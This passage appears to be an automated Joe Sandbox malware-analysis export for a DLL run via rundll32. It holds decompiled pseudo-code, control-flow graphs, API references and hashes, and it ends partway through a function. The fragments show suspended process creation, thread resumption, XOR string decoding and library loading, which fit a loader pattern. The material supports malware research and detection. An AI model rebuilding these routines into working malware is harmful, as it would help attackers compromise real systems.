                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2499131667-0
                                                                                                                                                                                                                • Opcode ID: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
                                                                                                                                                                                                                • Instruction ID: 1eed812b881aefb00d6193f01853791bde1d72691e5b42abaf90924a6ce1d54a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6701AD72601265BFE721CBA6DC88D9B7FECEF457E1B214165F905E2225E670EE0087A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 358 1000d038-1000d087 call 100096bf * 2 CreateProcessW
                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                			E1000D038(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                                                				struct _STARTUPINFOW _v72;
                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				E100096BF(__edx, 0, 0x10);
                                                                                                                                                                                                                				E100096BF( &_v72, 0, 0x44);
                                                                                                                                                                                                                				_v72.cb = 0x44;
                                                                                                                                                                                                                				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                                				return  ~( ~_t11) - 1;
                                                                                                                                                                                                                			}





                                                                                                                                                                                                                0x1000d049
                                                                                                                                                                                                                0x1000d056
                                                                                                                                                                                                                0x1000d05e
                                                                                                                                                                                                                0x1000d07a
                                                                                                                                                                                                                0x1000d080
                                                                                                                                                                                                                0x1000d087

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1
                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000D07A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateProcessmemset
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 2296119082-2746444292
                                                                                                                                                                                                                • Opcode ID: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
                                                                                                                                                                                                                • Instruction ID: d27b247edd7bdbe7ca00ef79e088292ca0cbd604f99a00e4c77ad78c7c6d32b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F065F26402183EF720E6A5CC0AFBF3AACCB81750F500025BF05EB1D1E6A0BD0582B5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 406 1000a0e3-1000a0f8 407 1000a0fa 406->407 408 1000a10f 406->408 410 1000a0fd-1000a108 407->410 409 1000a114-1000a134 408->409 413 1000a144-1000a148 409->413 414 1000a136-1000a13b 409->414 411 1000a167-1000a169 410->411 412 1000a10a-1000a10d 410->412 411->408 418 1000a16b-1000a16f call 10009525 411->418 412->408 412->410 416 1000a156-1000a160 lstrlenW 413->416 417 1000a14a-1000a154 413->417 414->414 415 1000a13d-1000a142 414->415 415->413 415->417 419 1000a162-1000a166 416->419 417->416 417->417 421 1000a174-1000a17c 418->421 422 1000a185-1000a18d 421->422 423 1000a17e-1000a183 421->423 424 1000a18f-1000a1a1 422->424 423->419 424->424 425 1000a1a3-1000a1a6 424->425 425->409
                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                			E1000A0E3(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                				short _v40;
                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                				signed int _t41;
                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                				_t52 = _a12;
                                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                                                                                				_t55 = _t52;
                                                                                                                                                                                                                				if(_t52 >= __edx) {
                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                					_t40 = 0x10020e3a;
                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                					asm("movsd");
                                                                                                                                                                                                                					asm("movsw");
                                                                                                                                                                                                                					asm("movsb");
                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                					asm("stosw");
                                                                                                                                                                                                                					asm("stosb");
                                                                                                                                                                                                                					_t24 = 0;
                                                                                                                                                                                                                					if(_v24 == 0) {
                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                						_t50 = _t24;
                                                                                                                                                                                                                						if(_t50 == 0) {
                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                							lstrlenW( &_v40);
                                                                                                                                                                                                                							return _t40;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                							_t11 = _t44 + 0x30; // 0x30
                                                                                                                                                                                                                							 *((char*)(_t58 + _t44 - 0x24)) = _t11;
                                                                                                                                                                                                                							_t44 = _t44 + 1;
                                                                                                                                                                                                                						} while (_t44 < _t50);
                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                						_t24 = _t24 + 1;
                                                                                                                                                                                                                					} while ( *((intOrPtr*)(_t58 + _t24 - 0x14)) != 0);
                                                                                                                                                                                                                					_t50 = 0xe;
                                                                                                                                                                                                                					if(_t24 > _t50) {
                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t45 = _a4;
                                                                                                                                                                                                                				while( *((intOrPtr*)((_t55 & 0x0000007f) + _t45)) !=  *((intOrPtr*)(_t55 + _t39))) {
                                                                                                                                                                                                                					_t55 = _t55 + 1;
                                                                                                                                                                                                                					if(_t55 < _t49) {
                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t57 = _t55 - _t52;
                                                                                                                                                                                                                				if(_t57 == 0) {
                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t33 = E10009525(_t57 + 1); // executed
                                                                                                                                                                                                                				_t41 = _t33;
                                                                                                                                                                                                                				_a12 = _t41;
                                                                                                                                                                                                                				if(_t41 != 0) {
                                                                                                                                                                                                                					_t51 = _a4;
                                                                                                                                                                                                                					_t42 = _v8;
                                                                                                                                                                                                                					_t48 = _t41 - _t52;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						 *(_t48 + _t52) =  *((_t52 & 0x0000007f) + _t51) ^  *(_t52 + _t42);
                                                                                                                                                                                                                						_t52 = _t52 + 1;
                                                                                                                                                                                                                						_t57 = _t57 - 1;
                                                                                                                                                                                                                					} while (_t57 != 0);
                                                                                                                                                                                                                					_t40 = _a12;
                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return 0x10020e3a;
                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                0x1000a0e3
                                                                                                                                                                                                                0x1000a0ec
                                                                                                                                                                                                                0x1000a0ef
                                                                                                                                                                                                                0x1000a0f1
                                                                                                                                                                                                                0x1000a0f4
                                                                                                                                                                                                                0x1000a0f8
                                                                                                                                                                                                                0x1000a10f
                                                                                                                                                                                                                0x1000a10f
                                                                                                                                                                                                                0x1000a114
                                                                                                                                                                                                                0x1000a11e
                                                                                                                                                                                                                0x1000a120
                                                                                                                                                                                                                0x1000a121
                                                                                                                                                                                                                0x1000a122
                                                                                                                                                                                                                0x1000a123
                                                                                                                                                                                                                0x1000a125
                                                                                                                                                                                                                0x1000a129
                                                                                                                                                                                                                0x1000a12a
                                                                                                                                                                                                                0x1000a12b
                                                                                                                                                                                                                0x1000a12c
                                                                                                                                                                                                                0x1000a12e
                                                                                                                                                                                                                0x1000a12f
                                                                                                                                                                                                                0x1000a134
                                                                                                                                                                                                                0x1000a144
                                                                                                                                                                                                                0x1000a144
                                                                                                                                                                                                                0x1000a148
                                                                                                                                                                                                                0x1000a156
                                                                                                                                                                                                                0x1000a15a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a14a
                                                                                                                                                                                                                0x1000a14a
                                                                                                                                                                                                                0x1000a14a
                                                                                                                                                                                                                0x1000a14d
                                                                                                                                                                                                                0x1000a151
                                                                                                                                                                                                                0x1000a152
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a136
                                                                                                                                                                                                                0x1000a136
                                                                                                                                                                                                                0x1000a136
                                                                                                                                                                                                                0x1000a137
                                                                                                                                                                                                                0x1000a13f
                                                                                                                                                                                                                0x1000a142
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a142
                                                                                                                                                                                                                0x1000a0fa
                                                                                                                                                                                                                0x1000a0fd
                                                                                                                                                                                                                0x1000a10a
                                                                                                                                                                                                                0x1000a10d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a10d
                                                                                                                                                                                                                0x1000a167
                                                                                                                                                                                                                0x1000a169
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a16f
                                                                                                                                                                                                                0x1000a174
                                                                                                                                                                                                                0x1000a176
                                                                                                                                                                                                                0x1000a17c
                                                                                                                                                                                                                0x1000a185
                                                                                                                                                                                                                0x1000a18a
                                                                                                                                                                                                                0x1000a18d
                                                                                                                                                                                                                0x1000a18f
                                                                                                                                                                                                                0x1000a19a
                                                                                                                                                                                                                0x1000a19d
                                                                                                                                                                                                                0x1000a19e
                                                                                                                                                                                                                0x1000a19e
                                                                                                                                                                                                                0x1000a1a3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a1a3
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000140,?,1001D948), ref: 1000A15A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                • String ID: GetCurrentPath
                                                                                                                                                                                                                • API String ID: 1659193697-3283422198
                                                                                                                                                                                                                • Opcode ID: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
                                                                                                                                                                                                                • Instruction ID: 41195c9a76874d14623ff530a364872f8f15e9d536d7495008c0b386dd41cbd3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F212B31B046966FEB01DEACC8804DEBBB7EB4F2C0B654679E981DB205D571DD868390
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 426 693414e1-69341712 435 69341599-693415a3 VirtualFree 426->435 436 693415a5-69341662 435->436 437 69341591-69341594 435->437 436->437
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                • String ID: u
                                                                                                                                                                                                                • API String ID: 1263568516-1900653220
                                                                                                                                                                                                                • Opcode ID: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
                                                                                                                                                                                                                • Instruction ID: 2167eb4b5afe2dc35e97cf936b047b4391e249a91e34a5e8835b39a7dfedc68b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92113976A58508EFCF50CFC8C880A9DBBF9FB2A790F124051E905AA260C335DE309B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                • String ID: u
                                                                                                                                                                                                                • API String ID: 1263568516-1900653220
                                                                                                                                                                                                                • Opcode ID: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
                                                                                                                                                                                                                • Instruction ID: 9d554ff6eec78cd0fbfa07987818fa2f8c261e5ca8ef9e3c010c7ec9449f3ada
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85115B76958509EFCF41CFC8C880A9EBBF9FB1A750F124051E905A6250C335DE20DB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                			E1000AB5A(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t9 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t1 = _t9 + 0xac; // 0x85a4c997
                                                                                                                                                                                                                				_t21 = __ecx;
                                                                                                                                                                                                                				E1000B687( &_v44,  *_t1 + 7, __eflags);
                                                                                                                                                                                                                				_t32 = 0;
                                                                                                                                                                                                                				_t12 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
                                                                                                                                                                                                                				_t29 = _t13;
                                                                                                                                                                                                                				if(_t29 != 0) {
                                                                                                                                                                                                                					GetLastError();
                                                                                                                                                                                                                					ResumeThread( *(_t21 + 4));
                                                                                                                                                                                                                					_t17 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_push(0x2710);
                                                                                                                                                                                                                					_push(_t29);
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
                                                                                                                                                                                                                						_t32 = 1;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t25 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					 *((intOrPtr*)(_t25 + 0x34))(_t29);
                                                                                                                                                                                                                					_t13 = _t32;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                			}















                                                                                                                                                                                                                0x1000ab5d
                                                                                                                                                                                                                0x1000ab65
                                                                                                                                                                                                                0x1000ab6d
                                                                                                                                                                                                                0x1000ab76
                                                                                                                                                                                                                0x1000ab7e
                                                                                                                                                                                                                0x1000ab81
                                                                                                                                                                                                                0x1000ab89
                                                                                                                                                                                                                0x1000ab8f
                                                                                                                                                                                                                0x1000ab93
                                                                                                                                                                                                                0x1000ab95
                                                                                                                                                                                                                0x1000aba3
                                                                                                                                                                                                                0x1000aba9
                                                                                                                                                                                                                0x1000abae
                                                                                                                                                                                                                0x1000abb3
                                                                                                                                                                                                                0x1000abb9
                                                                                                                                                                                                                0x1000abbd
                                                                                                                                                                                                                0x1000abbd
                                                                                                                                                                                                                0x1000abbe
                                                                                                                                                                                                                0x1000abc5
                                                                                                                                                                                                                0x1000abc8
                                                                                                                                                                                                                0x1000abc8
                                                                                                                                                                                                                0x1000abce

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000AB95
                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?,?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000ABA3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastResumeThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1307702467-0
                                                                                                                                                                                                                • Opcode ID: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
                                                                                                                                                                                                                • Instruction ID: 22877a52fd125be6f021b278ba47e52bd49f4af4be482d09d273dff15349f24a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1018632201220AFD341DBD8CCC8DEA7FF9EF8D691B514165F905E7226D730E84287A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                			E100098AE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				char _t5;
                                                                                                                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                                				_t22 = __edx;
                                                                                                                                                                                                                				_t5 = E10009473(_a4);
                                                                                                                                                                                                                				_t25 = 0;
                                                                                                                                                                                                                				_v8 = _t5;
                                                                                                                                                                                                                				_push(_t5);
                                                                                                                                                                                                                				if(_a4 != 0xb6) {
                                                                                                                                                                                                                					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t7 = GetModuleHandleA();
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                                					_t10 = E10009863(_t12, _t22, _t7); // executed
                                                                                                                                                                                                                					_t25 = _t10;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				E1000A27E( &_v8);
                                                                                                                                                                                                                				return _t25;
                                                                                                                                                                                                                			}










                                                                                                                                                                                                                0x100098b1
                                                                                                                                                                                                                0x100098b4
                                                                                                                                                                                                                0x100098ba
                                                                                                                                                                                                                0x100098bc
                                                                                                                                                                                                                0x100098c1
                                                                                                                                                                                                                0x100098c3
                                                                                                                                                                                                                0x100098cd
                                                                                                                                                                                                                0x100098ce
                                                                                                                                                                                                                0x100098dd
                                                                                                                                                                                                                0x100098d0
                                                                                                                                                                                                                0x100098d0
                                                                                                                                                                                                                0x100098d0
                                                                                                                                                                                                                0x100098e1
                                                                                                                                                                                                                0x100098e8
                                                                                                                                                                                                                0x100098ee
                                                                                                                                                                                                                0x100098ee
                                                                                                                                                                                                                0x100098f3
                                                                                                                                                                                                                0x100098fe

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098D0
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098DD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4133054770-0
                                                                                                                                                                                                                • Opcode ID: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
                                                                                                                                                                                                                • Instruction ID: 0a8907e418d20bcaecb58a7887a8f175eb85e45bc48063aec8ac5069f05a84aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57F0A731700214ABE704DFADDC8589EB7EDDF852D0710807AF806D7265DE70ED4087A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000A3EC() {
                                                                                                                                                                                                                				struct HINSTANCE__* _t2;
                                                                                                                                                                                                                				WCHAR* _t3;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t2 =  *0x10020e6c; // 0x0
                                                                                                                                                                                                                				if(_t2 != 0) {
                                                                                                                                                                                                                					FreeLibrary(_t2); // executed
                                                                                                                                                                                                                					 *0x10020e6c =  *0x10020e6c & 0x00000000;
                                                                                                                                                                                                                				}
